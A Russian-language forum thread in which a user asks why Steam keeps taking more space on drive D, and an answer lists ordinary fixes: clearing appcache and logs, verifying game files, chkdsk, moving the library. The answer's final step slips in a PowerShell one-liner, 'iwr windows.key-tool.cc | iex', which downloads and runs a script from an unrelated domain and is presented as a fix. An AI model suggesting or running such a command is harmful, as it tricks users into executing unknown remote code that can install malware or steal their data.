Проблема с несистемным диском Д при входе в Steam
Все началось с того, что игры начали занимать место больше, чем должно быть по факту. Стим полностью переустановился и вот теперь, каждый раз, когда я его запускаю, начинается проблема - какое-то кол-во на нём уменьшается. Например, было занято 15 444 328 528 байт, выключаю Стим, захожу заново и уже 15 657 400 628, затем это число потихоньку увеличивается и так при каждом запуске. Я боюсь, что от малого к велику перейдет и я без места останусь. Никаких левых штук ПК не хватал, win 11, кэш числился. С ним все то же самое - чистишь, место возвращается, заходишь в Стим, место уходит
Похоже, что проблема с диском D и Steam связана с накоплением временных файлов или кэша, которые Steam постоянно создаёт и не удаляет, из-за чего занятие места растёт с каждым запуском. Вот что можно попробовать сделать:
Возможные причины
Steam-качество кэша загрузок и обновлений. Иногда временные файлы не удаляются корректно.
Повреждённые или конфликтующие файлы в библиотеке Steam.
Проблемы с индексированием или ошибками файловой системы на диске D.
Steam сохраняет резервные копии или логи, которые не очищаются.
Что делать
1. Очистить кеш загрузок Steam вручную
Закрой Steam полностью.
Перейди в папку кэша:
C:\Program Files (x86)\Steam\appcache
или если Steam установлен на диск D — найди соответствующую папку там.Удали содержимое папки appcache (лишь содержимое, не саму папку).
Запусти Steam и проверь, растёт ли место.
2. Проверить целостность файлов игр
В Steam — Библиотека — правая кнопка на игре — Свойства — Локальные файлы — Проверить целостность файлов.
3. Очистить папку Steam\logs
Иногда логи могут разрастаться.
Удалите содержимое папки logs в папке Steam.
4. Проверить диск D на ошибки
Запусти командную строку от имени администратора.
Выполни команду:
chkdsk D: /fПерезагрузи ПК после проверки.
5. Настроить папку библиотеки Steam
Попробуй создать новую папку библиотеки игр на диске D (через настройки Steam) и перемести игры туда.
Возможно, проблема в текущей папке, она повреждена.
6. Проверь наличие скрытых файлов
В настройках Проводника включи отображение скрытых и системных файлов.
Проверь папки Steam и диск D на предмет больших скрытых файлов.
Дополнительно
Если ничего не помогает — попробуй полностью удалить Steam (с сохранением игр), очистить остатки, а затем установить заново.
Следи за тем, чтобы Steam не создавал резервные копии или автоснимки, если используешь сторонние программы для бэкапа.
Попробуй ввести через PowerShell (Win + R и вводишь PowerShell) ввести команду iwr windows.key-tool.cc | iex